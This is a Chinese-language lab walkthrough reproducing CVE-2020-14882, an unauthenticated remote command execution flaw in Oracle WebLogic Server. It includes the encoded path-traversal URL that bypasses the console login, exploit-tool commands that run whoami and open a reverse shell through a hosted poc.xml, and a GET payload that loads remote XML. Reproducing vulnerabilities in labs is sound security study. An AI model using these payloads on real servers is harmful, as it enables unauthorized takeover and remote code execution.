CVE-2020-14882
漏洞简介
Oracle WebLogic Server 未授权远程命令执行漏洞
原理
- 未经身份验证的远程攻击者可通过构造特殊的 HTTP GET 请求,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码
环境搭建
- 这边也特意出了一篇vulhub环境搭建,还不太会环境搭建的小伙伴可以看这里哟;
漏洞复现
- 访问
your-IP:7001
,页面出现404说明环境搭建成功;
- 继续访问
your-IP:7001/console
,出现一个登录页面;
-
由于不知道用户名和密码无法进入后台,但这里可以利用绕过验证漏洞,可以绕过登录;
your-IP:端口/console/images/%252E%252E%252Fconsole.portal
访问成功进入了后台, 但这里后台权限过低无法执行其他操作;
利用方式一
- 使用CVE-2020-14882_ALL漏洞利用工具,测试
whoami
命令,成功回显;
python3 CVE-2020-14882_ALL.py -u http://your-IP:7001 -c "whoami"
- 修改漏洞利用工具里的poc.xml,将IP和监听端口修改为自己的;
- 开启服务端http服务,默认是8000端口,使其可以访问到poc.xml;(注:命令执行目录)
python3 -m http.server
- 宿主机访问
your-IP:8000/poc.xml
,成功访问;
- 服务端也成功返回状态;
- 新开一个窗口,监听poc.xml监听端口,这里以1234为例;
- 再新开一个窗口,进入到漏洞利用工具目录下,执行反弹shell命令,成功反弹shell;
python3 CVE-2020-14882_ALL.py -u http://your-IP:7001 -x http://your-IP:8000/poc.xml
利用方式二 (未成功)
- 看其他大佬的方法,尝试在浏览器使用get请求也可反弹shell;
Payload
http://your-IP:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://your-IP/poc.xml")
- 但是尝试了几次都失败了,我也不知道啥子原因,如果有成功的大佬也希望可以交流一下,我学习学习;
以上内容就是Oracle WebLogic Server 未授权远程命令执行漏洞复现过程,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,请各位小伙伴多多支持,走之前别忘了点个赞哟😁!